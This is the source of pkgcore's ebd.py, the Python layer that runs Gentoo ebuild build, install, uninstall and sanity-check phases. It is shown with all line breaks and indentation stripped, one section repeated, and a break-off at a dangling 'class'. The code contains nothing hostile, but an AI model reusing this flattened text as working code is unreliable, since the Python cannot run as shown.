but the packages metadata/contents are bound to the workdir. In other words, install the package somewhere prior to executing clean if you intend on installing it. :return: :obj:`pkgcore.ebuild.ebuild_built.package` instance """ factory = ebuild_built.fake_package_factory(self._built_class) return factory.new_package( self.pkg, self.env["D"], pjoin(self.env["T"], "environment")) class binpkg_localize(ebd, setup_mixin, format.build): stage_depends = {"finalize": "setup", "setup": "start"} setup_is_for_src = False def __init__(self, domain, pkg, **kwargs): self._built_class = ebuild_built.package format.build.__init__(self, domain, pkg, {}, observer=kwargs.get("observer", None)) ebd.__init__(self, pkg, **kwargs) if self.eapi.options.has_merge_type: self.env["MERGE_TYPE"] = "binpkg" def finalize(self): return MutatedPkg(self.pkg, {"environment": self.get_env_source()}) class ebuild_operations: _checks = [] def _register_check(checks): """Decorator to register sanity checks that will be run.""" def _wrap_func(func): def wrapped(*args, **kwargs): return func(*args, **kwargs) checks.append(func) return wrapped return _wrap_func def _cmd_implementation_sanity_check(self, domain): """Run all defined sanity checks.""" failures = [] for check in self._checks: if result := check(self, self.pkg, domain=domain): failures.append(result) return failures @_register_check(_checks) def _check_required_use(self, pkg, **kwargs): """Perform REQUIRED_USE verification against a set of USE flags. Note that this assumes the REQUIRED_USE depset has been evaluated against a known set of enabled USE flags and is in collapsed form. """ if pkg.eapi.options.has_required_use: if failures := tuple(node for node in pkg.required_use if not node.match(pkg.use)): return errors.RequiredUseError(pkg, failures) @_register_check(_checks) def _check_pkg_pretend(self, pkg, *, domain, **kwargs): """Run pkg_pretend phase.""" # pkg_pretend is not defined or required if 'pretend' not in pkg.mandatory_phases: return commands = None if not pkg.built: commands = { 'request_inherit': partial(inherit_handler, self._eclass_cache), 'has_version': ebd_ipc.Has_Version(self), 'best_version': ebd_ipc.Best_Version(self), } # Use base build tempdir for $T instead of full pkg specific path to # avoid having to create/remove directories -- pkg_pretend isn't # allowed to write to the filesystem anyway. self.env = expected_ebuild_env(pkg) self.env["T"] = domain.pm_tmpdir ebd.set_path_vars(self.env, pkg, domain) # avoid clipping eend() messages self.env["PKGCORE_RC_PREFIX"] = '2' with TemporaryFile() as f: # suppress bash output by default fd_pipes = {1: f.fileno(), 2: f.fileno()} try: run_generic_phase( pkg, "pretend", self.env, tmpdir=None, fd_pipes=fd_pipes, userpriv=True, sandbox=True, extra_handlers=commands) except ProcessorError as e: f.seek(0) output = f.read().decode().strip('\n') return errors.PkgPretendError(pkg, output, e) class src_operations(ebuild_operations, format.build_operations): def __init__(self, domain, pkg, eclass_cache, observer=None): format.build_operations.__init__(self, domain, pkg, observer=observer) self._eclass_cache = eclass_cache def _cmd_implementation_build(self, observer, verified_files, clean=False, force_test=False): return buildable( self.domain, self.pkg, verified_files, self._eclass_cache, observer=observer, clean=clean, force_test=force_test) class misc_operations(ebd): def __init__(self, domain, *args, **kwds): self.domain = domain super().__init__(*args, **kwds) def configure(self, observer=None): return self._generic_phase('config', False, True) def info(self, observer=None): return self._generic_phase('info', True, True) class built_operations(ebuild_operations, format.operations): def __init__(self, domain, pkg, observer=None, initial_env=None): format.operations.__init__(self, domain, pkg, observer=observer) self._initial_env = initial_env self._localized_ebd = None def _cmd_implementation_localize(self, observer, force=False): if not force and getattr(self.pkg, '_is_from_source', False): return self.pkg self._localized_ebd = op = binpkg_localize( self.domain, self.pkg, clean=False, initial_env=self._initial_env, env_data_source=self.pkg.environment, observer=observer) return op.finalize() def _cmd_implementation_cleanup(self, observer, force=False): if not self._localized_ebd: return True return self._localized_ebd.cleanup(force=force) def _cmd_check_support_configure(self): pkg = self.pkg if 'config' not in pkg.mandatory_phases: return False return True def _cmd_implementation_configure(self, observer): misc = misc_operations( self.domain, self.pkg, env_data_source=self.pkg.environment, clean=True) try: misc.start() misc.configure() finally: misc.cleanup() return True
""" EBuild Daemon (ebd), main high level interface to ebuild execution env. Wraps :obj:`pkgcore.ebuild.processor` functionality into a higher level api, for example per phase methods. """ __all__ = ( "ebd", "setup_mixin", "install_op", "uninstall_op", "replace_op", "buildable", "binpkg_localize") import errno import os import re import shutil import sys import time from collections import defaultdict from functools import partial from itertools import chain from tempfile import TemporaryFile from snakeoil import data_source, klass from snakeoil.compatibility import IGNORED_EXCEPTIONS from snakeoil.contexts import chdir from snakeoil.currying import post_curry, pretty_docs from snakeoil.fileutils import touch from snakeoil.osutils import ensure_dirs, listdir_files, normpath, pjoin from snakeoil.process.spawn import is_sandbox_capable, is_userpriv_capable, spawn, spawn_bash from snakeoil.sequences import iflatten_instance, iter_stable_unique from .. import const from ..log import logger from ..operations import format, observer from ..os_data import portage_gid, portage_uid, xargs from ..package.mutated import MutatedPkg from . import ebd_ipc, ebuild_built, errors from .processor import (ProcessorError, chuck_UnhandledCommand, expected_ebuild_env, inherit_handler, release_ebuild_processor, request_ebuild_processor) class ebd: def __init__(self, pkg, initial_env=None, env_data_source=None, observer=None, clean=True, tmp_offset=None): """ :param pkg: :class:`pkgcore.ebuild.ebuild_src.package` instance this env is being setup for :param initial_env: initial environment to use for this ebuild :param env_data_source: a :obj:`snakeoil.data_source.base` instance to restore the environment from- used for restoring the state of an ebuild processing, whether for unmerging, or walking phases during building """ self.pkg = pkg self.eapi = pkg.eapi if not hasattr(self, "observer"): self.observer = observer if not self.eapi.is_supported: raise TypeError(f"package {pkg} uses unsupported EAPI: {str(self.eapi)!r}") if initial_env is not None: # copy. self.env = dict(initial_env) for x in ("USE", "ACCEPT_LICENSE"): self.env.pop(x, None) else: self.env = {} # Drop all USE_EXPAND variables from the exported environment. for u in self.domain.profile.use_expand: self.env.pop(u, None) # Only export USE_EXPAND variables for the package's enabled USE flags. d = defaultdict(list) for u in pkg.use: m = self.domain.use_expand_re.match(u) if m: use_expand, value = m.groups() d[use_expand.upper()].append(value) for k, v in d.items(): self.env[k] = ' '.join(sorted(v)) self.bashrc = self.env.pop("bashrc", ()) self.features = set(x.lower() for x in self.domain.features) self.env["FEATURES"] = ' '.join(sorted(self.features)) self.set_path_vars(self.env, self.pkg, self.domain) # internally implemented EAPI specific functions to skip when exporting env self.env["PKGCORE_EAPI_FUNCS"] = ' '.join(self.eapi.bash_funcs) self.env_data_source = env_data_source if (env_data_source is not None and not isinstance(env_data_source, data_source.base)): raise TypeError( "env_data_source must be None, or a pkgcore.data_source.base " f"derivative: {env_data_source.__class__}: {env_data_source}") iuse_effective_regex = f"^({'|'.join(re.escape(x) for x in pkg.iuse_effective)})$" self.env["PKGCORE_IUSE_EFFECTIVE"] = iuse_effective_regex.replace("\\.\\*", ".*") expected_ebuild_env(pkg, self.env, env_source_override=self.env_data_source) self.env["PKGCORE_FINALIZED_RESTRICT"] = ' '.join(str(x) for x in pkg.restrict) self.restrict = pkg.restrict for x in ("sandbox", "userpriv"): setattr(self, x, self.feat_or_bool(x) and not (x in self.restrict)) if self.userpriv and os.getuid() != 0: self.userpriv = False if "PORT_LOGDIR" in self.env: self.logging = pjoin( self.env["PORT_LOGDIR"], "%s:%s:%s.log" % ( pkg.cpvstr, self.__class__.__name__, time.strftime("%Y%m%d-%H%M%S", time.localtime()))) del self.env["PORT_LOGDIR"] else: self.logging = False self.env["PKGCORE_PKG_REPO"] = pkg.source_repository self.env["XARGS"] = xargs # wipe variables listed in ENV_UNSET for supporting EAPIs if self.eapi.options.has_env_unset: for x in self.env.pop('ENV_UNSET', ()): self.env.pop(x, None) # wipe any remaining internal settings from the exported env wipes = [k for k, v in self.env.items() if not isinstance(v, str)] for k in wipes: del self.env[k] self._set_op_vars(tmp_offset) self.clean_at_start = clean self.clean_needed = False # various IPC command support self._ipc_helpers = { # bash helpers 'doins': ebd_ipc.Doins(self), 'dodoc': ebd_ipc.Dodoc(self), 'dohtml': ebd_ipc.Dohtml(self), 'doinfo': ebd_ipc.Doinfo(self), 'dodir': ebd_ipc.Dodir(self), 'doexe': ebd_ipc.Doexe(self), 'dobin': ebd_ipc.Dobin(self), 'dosbin': ebd_ipc.Dosbin(self), 'dolib': ebd_ipc.Dolib(self), 'dolib.so': ebd_ipc.Dolib_so(self), 'dolib.a': ebd_ipc.Dolib_a(self), 'doman': ebd_ipc.Doman(self), 'domo': ebd_ipc.Domo(self), 'dosym': ebd_ipc.Dosym(self), 'dohard': ebd_ipc.Dohard(self), 'keepdir': ebd_ipc.Keepdir(self), # bash functions 'has_version': ebd_ipc.Has_Version(self), 'best_version': ebd_ipc.Best_Version(self), 'unpack': ebd_ipc.Unpack(self), 'eapply': ebd_ipc.Eapply(self), 'eapply_user': ebd_ipc.Eapply_User(self), 'docompress': ebd_ipc.Docompress(self), 'dostrip': ebd_ipc.Dostrip(self), # internals 'filter_env': ebd_ipc.FilterEnv(self), } def start(self): if self.clean_at_start: self.clean_needed = True if not self.cleanup(): return False self.setup_workdir() self._setup_env_data_source() self.clean_needed = True return True @staticmethod def set_path_vars(env, pkg, domain): # XXX: note this is just EAPI 3 and EAPI 7 compatibility; not full prefix, soon.. trailing_slash = pkg.eapi.options.trailing_slash env['ROOT'] = domain.root.rstrip(os.sep) + trailing_slash env['PKGCORE_PREFIX_SUPPORT'] = 'false' if pkg.eapi.options.prefix_capable: env['EPREFIX'] = domain.prefix.rstrip(os.sep) env['EROOT'] = ( pjoin(env['ROOT'].rstrip(trailing_slash), env['EPREFIX']) + trailing_slash) env['PKGCORE_PREFIX_SUPPORT'] = 'true' if pkg.eapi.options.has_sysroot: env['SYSROOT'] = env['ROOT'] env['ESYSROOT'] = pjoin(env['SYSROOT'], env['EPREFIX']) env['BROOT'] = env['EPREFIX'] def _set_op_vars(self, tmp_offset): # don't fool with this, without fooling with setup. self.tmpdir = self.domain.pm_tmpdir if tmp_offset: self.tmpdir = pjoin(self.tmpdir, tmp_offset.strip(os.sep)) self.builddir = pjoin(self.tmpdir, self.env["CATEGORY"], self.env["PF"]) for x, y in (("T", "temp"), ("WORKDIR", "work"), ("D", "image"), ("HOME", "homedir"), ("PKGCORE_EMPTYDIR", "empty")): self.env[x] = normpath(pjoin(self.builddir, y)) self.env["D"] += self.eapi.options.trailing_slash self.env["PORTAGE_LOGFILE"] = normpath(pjoin(self.env["T"], "build.log")) # XXX: Note that this is just EAPI 3 support, not yet prefix # full awareness. if self.pkg.eapi.options.prefix_capable: self.env["ED"] = normpath( pjoin(self.env["D"].rstrip(os.sep), self.env["EPREFIX"])) \ + self.eapi.options.trailing_slash # temporary install dir correct for all EAPIs self.ED = self.env.get('ED', self.env['D']) def get_env_source(self): with open(pjoin(self.env["T"], "environment"), "rb") as f: return data_source.bytes_data_source(f.read()) def _setup_env_data_source(self): if not ensure_dirs(self.env["T"], mode=0o770, gid=portage_gid, minimal=True): raise format.FailedDirectory( self.env['T'], "%s doesn't fulfill minimum mode %o and gid %i" % ( self.env['T'], 0o770, portage_gid)) if self.env_data_source is not None: fp = pjoin(self.env["T"], "environment") # load data first (might be a local_source), *then* write # if it's a src_ebuild being installed, trying to do two steps # stomps the local_sources data. data = self.env_data_source.bytes_fileobj().read() with open(fp, "wb") as f: f.write(data) del data def _set_per_phase_env(self, phase, env): self._setup_merge_type(phase, env) # add phase specific helper paths to PATH if they exist ebuild_phase = self.eapi.phases.get(phase, '') if ebuild_phase in self.eapi.helpers: path = chain.from_iterable(( const.PATH_FORCED_PREPEND, self.pkg.eapi.helpers.get('global', ()), self.eapi.helpers[ebuild_phase], os.environ.get('PATH', '').split(os.pathsep), )) env['PATH'] = os.pathsep.join(path) def _setup_merge_type(self, phase, env): # only allowed in pkg_ phases. if (not self.eapi.phases.get(phase, "").startswith("pkg_") and not phase == 'setup-binpkg'): return # note all pkgs have this attribute is_source = getattr(self.pkg, '_is_from_source', True) if self.eapi.options.has_merge_type: env["MERGE_TYPE"] = (is_source and "source") or "binary" else: # we still must export this, just via the portage var name w/ # different values. if we didn't, spec or not, kernel binpkg # merging would be broke. env["EMERGE_FROM"] = (is_source and "ebuild") or "binary" def setup_logging(self): if self.logging and not ensure_dirs(os.path.dirname(self.logging), mode=0o2770, gid=portage_gid): raise format.FailedDirectory( os.path.dirname(self.logging), "PORT_LOGDIR, desired mode 02770 and gid %i" % portage_gid) def setup_workdir(self): # ensure dirs. for k in ("HOME", "T", "WORKDIR", "D"): if not ensure_dirs(self.env[k], mode=0o4770, gid=portage_gid, minimal=True): raise format.FailedDirectory( self.env[k], "%s doesn't fulfill minimum mode %o and gid %i" % (k, 0o770, portage_gid)) # XXX hack, just 'til pkgcore controls these directories if (os.stat(self.env[k]).st_mode & 0o2000): logger.warning(f"{self.env[k]} ( {k} ) is setgid") def _generic_phase(self, phase, userpriv, sandbox, extra_handlers={}, failure_allowed=False, suppress_bashrc=False): """ :param phase: phase to execute :param userpriv: will we drop to :obj:`pkgcore.os_data.portage_uid` and :obj:`pkgcore.os_data.portage_gid` access for this phase? :param sandbox: should this phase be sandboxed? """ if phase not in self.pkg.mandatory_phases: # TODO(ferringb): Note the preinst hack; this will be removed once dyn_pkg_preinst # is dead in full (currently it has a selinux labelling and suidctl ran from there) if phase != 'preinst': return True if 'selinux' not in self.features and 'suidctl' not in self.features: return True shutil.rmtree(self.env["PKGCORE_EMPTYDIR"], ignore_errors=True) os.mkdir(self.env["PKGCORE_EMPTYDIR"]) userpriv = self.userpriv and userpriv sandbox = self.sandbox and sandbox self._set_per_phase_env(phase, self.env) extra_handlers = extra_handlers.copy() extra_handlers.update(self._ipc_helpers) if not suppress_bashrc: extra_handlers.setdefault("request_bashrcs", self._request_bashrcs) return run_generic_phase( self.pkg, phase, self.env, userpriv, sandbox, extra_handlers=extra_handlers, failure_allowed=failure_allowed, logging=self.logging) def _request_bashrcs(self, ebd): for source in self.domain.get_package_bashrcs(self.pkg): if source.path is not None: ebd.write(f"path\n{source.path}") elif source.get_data is not None: raise NotImplementedError else: chuck_UnhandledCommand( ebd, "bashrc request: unable to process bashrc " f"due to source '{source}' due to lacking usable get_*") if not ebd.expect("next"): chuck_UnhandledCommand( ebd, "bashrc transfer, didn't receive 'next' response. " "failure?") ebd.write("end_request") def set_is_replacing(self, *pkgs): if self.eapi.options.exports_replacing: self.env['REPLACING_VERSIONS'] = " ".join(pkg.PVR for pkg in pkgs) def set_is_being_replaced_by(self, pkg=None): if self.eapi.options.exports_replacing and pkg is not None: self.env['REPLACED_BY_VERSION'] = pkg.PVR def cleanup(self, disable_observer=False, force=False): if not force: if not self.clean_needed: return True if not os.path.exists(self.builddir): return True if disable_observer: return self.do_cleanup(disable_observer=disable_observer) return self.do_cleanup() @observer.decorate_build_method("cleanup") def do_cleanup(self): try: shutil.rmtree(self.builddir) # try to wipe the cat dir; if not empty, ignore it try: os.rmdir(os.path.dirname(self.builddir)) except EnvironmentError as e: # POSIX specifies either ENOTEMPTY or EEXIST for non-empty dir # in particular, Solaris uses EEXIST in that case. # https://github.com/pkgcore/pkgcore/pull/181 if e.errno not in (errno.ENOTEMPTY, errno.EEXIST): raise except EnvironmentError as e: raise format.GenericBuildError( f"clean: Caught exception while cleansing: {e}") from e return True def feat_or_bool(self, name, extra_env=None): if name in self.env: v = bool(self.env[name]) del self.env[name] name = name.lower() if v: self.features.add(name) else: if name in self.features: self.features.remove(name) elif extra_env is not None and name in extra_env: v = bool(extra_env[name]) if v: self.features.add(name.lower()) else: self.features.remove(name.lower()) else: v = name.lower() in self.features return v def __stage_step_callback__(self, stage): try: touch(pjoin(self.builddir, f'.{stage}')) except EnvironmentError: # we really don't care... pass def _reload_state(self): try: self.__set_stage_state__( [x[1:] for x in listdir_files(self.builddir) if x.startswith(".")]) except EnvironmentError as e: if e.errno not in (errno.ENOTDIR, errno.ENOENT): raise class setup_mixin: setup_is_for_src = True def setup(self, setup_phase_override=None): self.setup_logging() additional_commands = {} phase_name = "setup-binpkg" if self.setup_is_for_src: phase_name = "setup" if setup_phase_override is not None: phase_name = setup_phase_override if self.setup_is_for_src: additional_commands["request_inherit"] = partial(inherit_handler, self.eclass_cache) return self._generic_phase( phase_name, False, True, extra_handlers=additional_commands) def run_generic_phase(pkg, phase, env, userpriv, sandbox, fd_pipes=None, extra_handlers=None, failure_allowed=False, logging=None, **kwargs): """ :param phase: phase to execute :param env: environment mapping for the phase :param userpriv: will we drop to :obj:`pkgcore.os_data.portage_uid` and :obj:`pkgcore.os_data.portage_gid` access for this phase? :param sandbox: should this phase be sandboxed? :param fd_pipes: use custom file descriptors for ebd instance :type fd_pipes: mapping between file descriptors :param extra_handlers: extra command handlers :type extra_handlers: mapping from string to callable :param failure_allowed: allow failure without raising error :type failure_allowed: boolean :param logging: None or a filepath to log output to :return: True when the phase has finished execution """ userpriv = userpriv and is_userpriv_capable() sandbox = sandbox and is_sandbox_capable() tmpdir = kwargs.get('tmpdir', env.get('T', None)) if env is None: env = expected_ebuild_env(pkg) ebd = request_ebuild_processor(userpriv=userpriv, sandbox=sandbox, fd_pipes=fd_pipes) # this is a bit of a hack; used until ebd accepts observers that handle # the output redirection on its own. Primary relevance is when # stdout/stderr are pointed at a file; we leave buffering on, just # force the flush for synchronization. sys.stdout.flush() sys.stderr.flush() try: if not ebd.run_phase(phase, env, tmpdir=tmpdir, sandbox=sandbox, logging=logging, additional_commands=extra_handlers): if not failure_allowed: raise format.GenericBuildError( phase + ": Failed building (False/0 return from handler)") logger.warning(f"executing phase {phase}: execution failed, ignoring") except Exception as e: if isinstance(e, ebd_ipc.IpcError): # notify bash side of IPC error ebd.write(e.ret) if isinstance(e, ebd_ipc.IpcInternalError): # show main exception cause for internal IPC errors ebd.shutdown_processor(force=True) raise e.__cause__ try: ebd.shutdown_processor() except ProcessorError as pe: # catch die errors during shutdown e = pe release_ebuild_processor(ebd) if isinstance(e, ProcessorError): # force verbose die output e._verbosity = 1 raise e elif isinstance(e, IGNORED_EXCEPTIONS + (format.GenericBuildError,)): raise raise format.GenericBuildError( f"Executing phase {phase}: Caught exception: {e}") from e release_ebuild_processor(ebd) return True class install_op(ebd, format.install): """Phase operations and steps for install execution.""" def __init__(self, domain, pkg, observer): format.install.__init__(self, domain, pkg, observer) ebd.__init__( self, pkg, observer=observer, initial_env=self.domain.settings, env_data_source=pkg.environment, clean=False) preinst = pretty_docs( observer.decorate_build_method("preinst")( post_curry(ebd._generic_phase, "preinst", False, False)), "run the postinst phase") postinst = pretty_docs( observer.decorate_build_method("postinst")( post_curry(ebd._generic_phase, "postinst", False, False)), "run the postinst phase") def add_triggers(self, domain_op, engine): self.new_pkg.add_format_triggers(domain_op, self, engine) class uninstall_op(ebd, format.uninstall): """Phase operations and steps for uninstall execution.""" def __init__(self, domain, pkg, observer): format.uninstall.__init__(self, domain, pkg, observer) ebd.__init__( self, pkg, observer=observer, initial_env=self.domain.settings, env_data_source=pkg.environment, clean=False, tmp_offset="unmerge") prerm = pretty_docs( observer.decorate_build_method("prerm")( post_curry(ebd._generic_phase, "prerm", False, False)), "run the prerm phase") postrm = pretty_docs( observer.decorate_build_method("postrm")( post_curry( ebd._generic_phase, "postrm", False, False, failure_allowed=True)), "run the postrm phase") def add_triggers(self, domain_op, engine): self.old_pkg.add_format_triggers(domain_op, self, engine) def finish(self): self.cleanup() return format.uninstall.finish(self) class replace_op(format.replace): """Phase operations and steps for replace execution.""" install_kls = staticmethod(install_op) uninstall_kls = staticmethod(uninstall_op) def __init__(self, domain, old_pkg, new_pkg, observer): super().__init__(domain, old_pkg, new_pkg, observer) self.install_op = install_op(domain, new_pkg, observer) self.install_op.set_is_replacing(old_pkg) self.uninstall_op = uninstall_op(domain, old_pkg, observer) self.uninstall_op.set_is_being_replaced_by(new_pkg) def start(self): self.install_op.start() self.uninstall_op.start() return True prerm = klass.alias_method("uninstall_op.prerm") postrm = klass.alias_method("uninstall_op.postrm") preinst = klass.alias_method("install_op.preinst") postinst = klass.alias_method("install_op.postinst") def finalize(self): ret = self.uninstall_op.finish() ret2 = self.install_op.finish() return (ret and ret2) def add_triggers(self, domain_op, engine): self.uninstall_op.add_triggers(domain_op, engine) self.install_op.add_triggers(domain_op, engine) class buildable(ebd, setup_mixin, format.build): """Generic build operation.""" # XXX this is unclean- should be handing in strictly what is build # env, rather then dumping domain settings as env. def __init__(self, domain, pkg, verified_files, eclass_cache, observer=None, force_test=False, **kwargs): """ :param pkg: :obj:`pkgcore.ebuild.ebuild_src.package` instance we'll be building :param eclass_cache: the :class:`pkgcore.ebuild.eclass_cache` we'll be using :param verified_files: mapping of fetchables mapped to their disk location """ self._built_class = ebuild_built.fresh_built_package format.build.__init__(self, domain, pkg, verified_files, observer) domain_settings = self.domain.settings ebd.__init__(self, pkg, initial_env=domain_settings, **kwargs) self.env["FILESDIR"] = pjoin(os.path.dirname(pkg.ebuild.path), "files") self.eclass_cache = eclass_cache self.run_test = force_test or self.feat_or_bool("test", domain_settings) self.allow_failed_test = self.feat_or_bool("test-fail-continue", domain_settings) if "test" in self.restrict: self.run_test = False elif not force_test and "test" not in pkg.use: if self.run_test: logger.warning(f"disabling test for {pkg} due to test use flag being disabled") self.run_test = False # XXX minor hack path = self.env["PATH"].split(os.pathsep) for s, default in (("DISTCC", ".distcc"), ("CCACHE", "ccache")): b = (self.feat_or_bool(s, domain_settings) and s not in self.restrict) setattr(self, s.lower(), b) if b: # looks weird I realize, but # pjoin("/foor/bar", "/barr/foo") == "/barr/foo" # and pjoin("/foo/bar", ".asdf") == "/foo/bar/.asdf" self.env.setdefault(s + "_DIR", pjoin(self.domain.tmpdir, default)) # gentoo bug 355283 libdir = self.env.get("ABI") if libdir is not None: libdir = self.env.get(f"LIBDIR_{libdir}") if libdir is not None: libdir = self.env.get(libdir) if libdir is None: libdir = "lib" path.insert(0, f"/usr/{libdir}/{s.lower()}/bin") else: for y in ("_PATH", "_DIR"): if s + y in self.env: del self.env[s+y] self.env["PATH"] = os.pathsep.join(path) # ordering must match appearance order in SRC_URI per PMS self.env["A"] = ' '.join(iter_stable_unique(pkg.distfiles)) if self.eapi.options.has_AA: pkg = self.pkg while hasattr(pkg, '_raw_pkg'): pkg = getattr(pkg, '_raw_pkg') self.env["AA"] = ' '.join(set(iflatten_instance(pkg.distfiles))) if self.eapi.options.has_KV: self.env["KV"] = domain.KV if self.eapi.options.has_merge_type: self.env["MERGE_TYPE"] = "source" if self.eapi.options.has_portdir: self.env["PORTDIR"] = pkg.repo.location self.env["ECLASSDIR"] = eclass_cache.eclassdir if self.setup_is_for_src: # TODO: PORTAGE_ACTUAL_DISTDIR usage by VCS eclasses needs to be # dropped, but it's currently required for repo reuse. self.env['PORTAGE_ACTUAL_DISTDIR'] = domain.distdir self.env['DISTDIR'] = normpath(pjoin(self.builddir, 'distdir')) for k in ('PORTAGE_ACTUAL_DISTDIR', 'DISTDIR'): self.env[k] = os.path.realpath(self.env[k]).rstrip(os.sep) + os.sep def _setup_distfiles(self): # fetch distfiles if not self.verified_files: ops = self.domain.pkg_operations(self.pkg, observer=self.observer) if ops.fetch(): # this break encapsulation and should be refactored. Trace # f35f2 and 6561eac for where this was refactored. self.verified_files = ops.verified_files # symlink them into builddir if self.verified_files: try: if os.path.exists(self.env["DISTDIR"]): if (os.path.isdir(self.env["DISTDIR"]) and not os.path.islink(self.env["DISTDIR"])): shutil.rmtree(self.env["DISTDIR"]) else: os.unlink(self.env["DISTDIR"]) except EnvironmentError as e: raise format.FailedDirectory( self.env["DISTDIR"], f"failed removing existing file/dir/link: {e}") from e if not ensure_dirs(self.env["DISTDIR"], mode=0o770, gid=portage_gid): raise format.FailedDirectory( self.env["DISTDIR"], "failed creating distdir symlink directory") try: for src, dest in [ (k, pjoin(self.env["DISTDIR"], v.filename)) for (k, v) in self.verified_files.items()]: os.symlink(src, dest) except EnvironmentError as e: raise format.GenericBuildError( f"Failed symlinking in distfiles for src {src} -> {dest}: {e}") from e @observer.decorate_build_method("setup") def setup(self): """Execute the setup phase, mapping out to pkg_setup in the ebuild. Necessarily dirs are created as required, and build env is initialized at this point. """ if self.distcc: for p in ("", "/lock", "/state"): if not ensure_dirs(pjoin(self.env["DISTCC_DIR"], p), mode=0o2775, gid=portage_gid): raise format.FailedDirectory( pjoin(self.env["DISTCC_DIR"], p), "failed creating needed distcc directory") if self.ccache: # yuck. st = None try: st = os.stat(self.env["CCACHE_DIR"]) except OSError as e: st = None if not ensure_dirs(self.env["CCACHE_DIR"], mode=0o2775, gid=portage_gid): raise format.FailedDirectory( self.env["CCACHE_DIR"], "failed creation of ccache dir") from e # XXX this is more then mildly stupid. st = os.stat(self.env["CCACHE_DIR"]) try: if st.st_gid != portage_gid or (st.st_mode & 0o2775) != 0o2775: try: cwd = os.getcwd() except OSError: cwd = "/" with chdir(cwd): # crap. os.chmod(self.env["CCACHE_DIR"], 0o2775) os.chown(self.env["CCACHE_DIR"], -1, portage_gid) if 0 != spawn( ["chgrp", "-R", str(portage_gid), self.env["CCACHE_DIR"]]): raise format.FailedDirectory( self.env["CCACHE_DIR"], "failed changing ownership for CCACHE_DIR") if 0 != spawn_bash( "find '%s' -type d -print0 | %s --null chmod 02775" % (self.env["CCACHE_DIR"], xargs)): raise format.FailedDirectory( self.env["CCACHE_DIR"], "failed correcting perms for CCACHE_DIR") if 0 != spawn_bash( "find '%s' -type f -print0 | %s --null chmod 0775" % (self.env["CCACHE_DIR"], xargs)): raise format.FailedDirectory( self.env["CCACHE_DIR"], "failed correcting perms for CCACHE_DIR") except OSError as e: raise format.FailedDirectory( self.env["CCACHE_DIR"], "failed ensuring perms/group owner for CCACHE_DIR") from e return setup_mixin.setup(self) def configure(self): """Execute the configure phase. Does nothing if the pkg's EAPI is less than 2 (that spec lacks a separated configure phase). """ if "configure" in self.eapi.phases: return self._generic_phase("configure", True, True) return True def prepare(self): """Execute a source preparation phase. does nothing if the pkg's EAPI is less than 2 """ ret = True if "prepare" in self.eapi.phases: ret = self._generic_phase("prepare", True, True) if (self.eapi.options.user_patches and not os.path.exists(pjoin(self.env['T'], '.user_patches_applied'))): self.observer.error( 'eapply_user (or default) must be called in src_prepare()') raise format.GenericBuildError('missing eapply_user call') return ret def nofetch(self): """Execute the nofetch phase. We need the same prerequisites as setup, so reuse that. """ ensure_dirs(self.env["T"], mode=0o770, gid=portage_gid, minimal=True) return setup_mixin.setup(self, "nofetch") def unpack(self): """Execute the unpack phase.""" if self.setup_is_for_src: self._setup_distfiles() if self.userpriv: try: os.chown(self.env["WORKDIR"], portage_uid, -1) except OSError as e: raise format.GenericBuildError( "failed forcing %i uid for WORKDIR: %s" % (portage_uid, e)) from e return self._generic_phase("unpack", True, True) compile = pretty_docs( observer.decorate_build_method("compile")( post_curry(ebd._generic_phase, "compile", True, True)), "Run the compile phase (maps to src_compile).") @observer.decorate_build_method("install") def install(self): """Run the install phase (maps to src_install).""" # TODO: replace print() usage with observer print(f">>> Install {self.env['PF']} into {self.ED!r} category {self.env['CATEGORY']}") ret = self._generic_phase("install", False, True) print(f">>> Completed installing {self.env['PF']} into {self.ED!r}") return ret @observer.decorate_build_method("test") def test(self): """Run the test phase (if enabled), maps to src_test.""" if not self.run_test: return True return self._generic_phase( "test", True, True, failure_allowed=self.allow_failed_test) def finalize(self): """Finalize the operation. This yields a built package, but the packages metadata/contents are bound to the workdir. In other words, install the package somewhere prior to executing clean if you intend on installing it. :return: :obj:`pkgcore.ebuild.ebuild_built.package` instance """ factory = ebuild_built.fake_package_factory(self._built_class) return factory.new_package( self.pkg, self.env["D"], pjoin(self.env["T"], "environment")) class binpkg_localize(ebd, setup_mixin, format.build): stage_depends = {"finalize": "setup", "setup": "start"} setup_is_for_src = False def __init__(self, domain, pkg, **kwargs): self._built_class = ebuild_built.package format.build.__init__(self, domain, pkg, {}, observer=kwargs.get("observer", None)) ebd.__init__(self, pkg, **kwargs) if self.eapi.options.has_merge_type: self.env["MERGE_TYPE"] = "binpkg" def finalize(self): return MutatedPkg(self.pkg, {"environment": self.get_env_source()}) class ebuild_operations: _checks = [] def _register_check(checks): """Decorator to register sanity checks that will be run.""" def _wrap_func(func): def wrapped(*args, **kwargs): return func(*args, **kwargs) checks.append(func) return wrapped return _wrap_func def _cmd_implementation_sanity_check(self, domain): """Run all defined sanity checks.""" failures = [] for check in self._checks: if result := check(self, self.pkg, domain=domain): failures.append(result) return failures @_register_check(_checks) def _check_required_use(self, pkg, **kwargs): """Perform REQUIRED_USE verification against a set of USE flags. Note that this assumes the REQUIRED_USE depset has been evaluated against a known set of enabled USE flags and is in collapsed form. """ if pkg.eapi.options.has_required_use: if failures := tuple(node for node in pkg.required_use if not node.match(pkg.use)): return errors.RequiredUseError(pkg, failures) @_register_check(_checks) def _check_pkg_pretend(self, pkg, *, domain, **kwargs): """Run pkg_pretend phase.""" # pkg_pretend is not defined or required if 'pretend' not in pkg.mandatory_phases: return commands = None if not pkg.built: commands = { 'request_inherit': partial(inherit_handler, self._eclass_cache), 'has_version': ebd_ipc.Has_Version(self), 'best_version': ebd_ipc.Best_Version(self), } # Use base build tempdir for $T instead of full pkg specific path to # avoid having to create/remove directories -- pkg_pretend isn't # allowed to write to the filesystem anyway. self.env = expected_ebuild_env(pkg) self.env["T"] = domain.pm_tmpdir ebd.set_path_vars(self.env, pkg, domain) # avoid clipping eend() messages self.env["PKGCORE_RC_PREFIX"] = '2' with TemporaryFile() as f: # suppress bash output by default fd_pipes = {1: f.fileno(), 2: f.fileno()} try: run_generic_phase( pkg, "pretend", self.env, tmpdir=None, fd_pipes=fd_pipes, userpriv=True, sandbox=True, extra_handlers=commands) except ProcessorError as e: f.seek(0) output = f.read().decode().strip('\n') return errors.PkgPretendError(pkg, output, e) class src_operations(ebuild_operations, format.build_operations): def __init__(self, domain, pkg, eclass_cache, observer=None): format.build_operations.__init__(self, domain, pkg, observer=observer) self._eclass_cache = eclass_cache def _cmd_implementation_build(self, observer, verified_files, clean=False, force_test=False): return buildable( self.domain, self.pkg, verified_files, self._eclass_cache, observer=observer, clean=clean, force_test=force_test) class 